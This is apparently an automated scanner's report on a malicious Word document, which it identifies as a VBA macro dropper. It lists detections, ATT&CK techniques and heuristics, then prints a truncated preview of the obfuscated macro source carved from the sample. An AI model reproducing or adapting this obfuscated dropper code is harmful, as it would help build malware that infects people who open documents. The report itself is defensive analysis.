MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicating it is likely designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6459108-0' further supports its role as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6459108-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6459108-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86648 bytes |
SHA-256: f8a6c4a410012873f16038441ea833e2512740c058314d39d66d41dfcec03b24 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 27 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "izSlTImrYi"
Sub FpDUOuOFbMf()
On Error Resume Next
While tmXvLfVTSi < DqLMQE
Set GfzAAqh = AiTuHMDUYwv
aLDOOaj = 9941430 + Round(CiwAOFzjtm) - 6337029 * Cos(2718780) / fmAYXzAWmN + Chr(rmucimZK)
DzAVttGDofL = wvjQOpD / zGQUiIcLXzH
Wend
Select Case Wjbimii
Case 5743566
zhHCFtrNLUwWb = whfqlRufqXw
STwijLZrBZJSY = 2972342
Case 7111496
LcLquzfBGosMwR = jDNaXPhlkwkhX
NSVjzTOMI = Rnd(9565036)
Case 4167263
zXvSMvjiaOLp = Atn(2616202)
iratKPIdtVX = Fix(6233450 + 9737911 * 9666424 * WvPEjSKpSj)
End Select
For zpzzHjSPpWmO = 7518782 To jTiZvj
lFDTvkiPUBHJVR = 3628325 - uOqNiIGjjcw
Select Case wfPXD
Case 8440232
jtfLwoA = ChrW(UiERoNnkL - CSng(SNcwT))
TmbRomkGiFjm = CuZinlF
Case 5407405
KpKvESk = ChrB(kkZssJMiji)
wniiBVJKtfoNO = 2059000
End Select
bmHshS = Sitn - 4186572
For VwNVK = NzGDLiYbLJZ To 9020099
rwvXKh = (7002505 * 6597705 + boAbcmNjo * Sin(zaffiJDjjAbzTn - CDbl(iBZaCnZ) * 388622 * XSDjBlNiVZvh) / 2323754 * CLng(3582526 - CDate(OHBAiwd)) / NQwlnFlMZ + 4687923 / (IPGTfwmwctrdR / MLumYTotzpS - AZYjN / Int(4265955 - Round(TKzIoW) + 459493 / 9211628)))
Next
Next
End Sub
Function wPYaHFLfWdUmB()
On Error Resume Next
inMqjJ = "GzPDVcStITqXNwPlnEzNBrrPSwlRqF"
GLSvnjvUik = GBbCtb = (7309551 * 7503123 + GclaCKLjaRS * Sin(OKIntrriK - CDbl(aDfNP) * 4883469 * OZYFMCjZoFzspX) / 6011767 * CLng(2186954 - CDate(srTPAjuEXDBi)) / oumiMstQBHbNF + 7317127 / (pVivrrUYFiOpd / pzfrt - CGGLmRXr / Int(6913244 - Round(BuzAPBYFqDUWj) + 77828 / 9680498)))
UwbKDr = PQMHw = (4317887 * 2244676 + riOTIaTdo * Sin(jTrdkna - CDbl(AqwjaGNjB) * 1396768 * cvfjcIhmEw) / 3187836 * CLng(6806437 - CDate(hTTfLljZjWWVY)) / IIGYYMw + 2367580 / (BkOVDAWc / HFzHmiXQbFv - JNDwYiwXs / Int(4403596 - Round(VBRuwQcYKumOT) + 2200204 / 243532)))
HVQTNwTjVbP = iuivbdfghnkjgyugjn(inMqjJ, 19, 7)
vkOtkYaVb = "ilTjQmViMqJOOXPtmq&wo=%2rav% tGnlARb"
jPJCDvpbkb = aBDtMiwHqHhoqn = (9395284 * 5867776 + SLYLG * Sin(UJBPiNjhVIfR - CDbl(tMKGHj) * 8258327 * rFJHizGqZH) / 7830914 * CLng(3771434 - CDate(jjKORtJ)) / MjLWqkpIER + 5997371 / (LdDrHvOa / vAqzsKczrpmhC - YwlrPQiUqJ / Int(762695 - Round(GjSHV) + 6057564 / 6781102)))
FBQIfSNd = QfUYwaNINbs = (6620753 * 1839674 + ftWEwJIbKhtqEw * Sin(kTGzTOsdMto - CDbl(ZHOQV) * 8550830 * AZlRjZ) / 5051601 * CLng(7917766 - CDate(nfHWRccIl)) / qjmPJKKGjTvQ + 4637797 / (wvGzBaYsZXqhmS / wfGflBYOKbHW - qWZXHJaV / Int(4166928 - Round(GLLzJOYcXr) + 3893110 / 7493393)))
AcwtjiTPI = iuivbdfghnkjgyugjn(vkOtkYaVb, 7, 12)
lrQNwnAUM = "Dqo%4rav%!!%3rav%!nzZYJbSbqFWMnokOzknoAZJp"
bZTdUnIQW = AtvSoQk = (6201411 * 3582872 + ZfGBIUR * Sin(JsQKnvJhFhk - CDbl(pMlMvmPJVWRY) * 5538549 * ZTYZNbtZO) / 4977991 * CLng(9204470 - CDate(GzJGLDviWMtuG)) / FHMmashQW + 8121078 / (fUJuQz / QFjQAOL - cwAMZiS / Int(8319509 - Round(mMczDHqcT) + 9585853 / 6111330)))
oDijGw = lkFPiiAppHz = (5240563 * 2308334 + jPJQiMcn * Sin(DVMMzq - CDbl(hRffrNvzqzSB) * 6398508 * PBnnYaSCTS) / 1216137 * CLng(9726347 - CDate(BuWRCzBZjv)) / YVUMZiuaFdo + 3830213 / (ZZQUfzMZs / uCUiPCfFjFGO - GGcoY / Int(6024623 - Round(zNazscjjuijHj) + 6993820 / 5028169)))
ZrosSih = iuivbdfghnkjgyugjn(lrQNwnAUM, 25, 15)
upFTJhwLPn = "AIGKzlcfHsBhRONhUUOdIes&&p=%1rav%r"
NXUZPzr = dtkpvSzdCjzjI = (3691461 * 5254761 + DjRzupq * Sin(zVfBjhOEwSfFq - CDbl(rCSPvd) * 2041694 * kHqVWFZ) / 465805 * CLng(9707918 - CDate(DrsanvwUSvip)) / VUtoOjiuMijk + 4545801 / (LKJivTs / wQRPW - aLPfuUUA / Int(5494929 - Round(LVTtrJJp) + 2963396 / 6903001)))
fSNlYo = KIQmVvTWcXwJ = (2383205 * 3904702 + SDqDr * Sin(itTaAzK - CDbl(HbAnjQDwtYYB) * 5803441 * sMLHYrqFzLsabO) / 9539
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.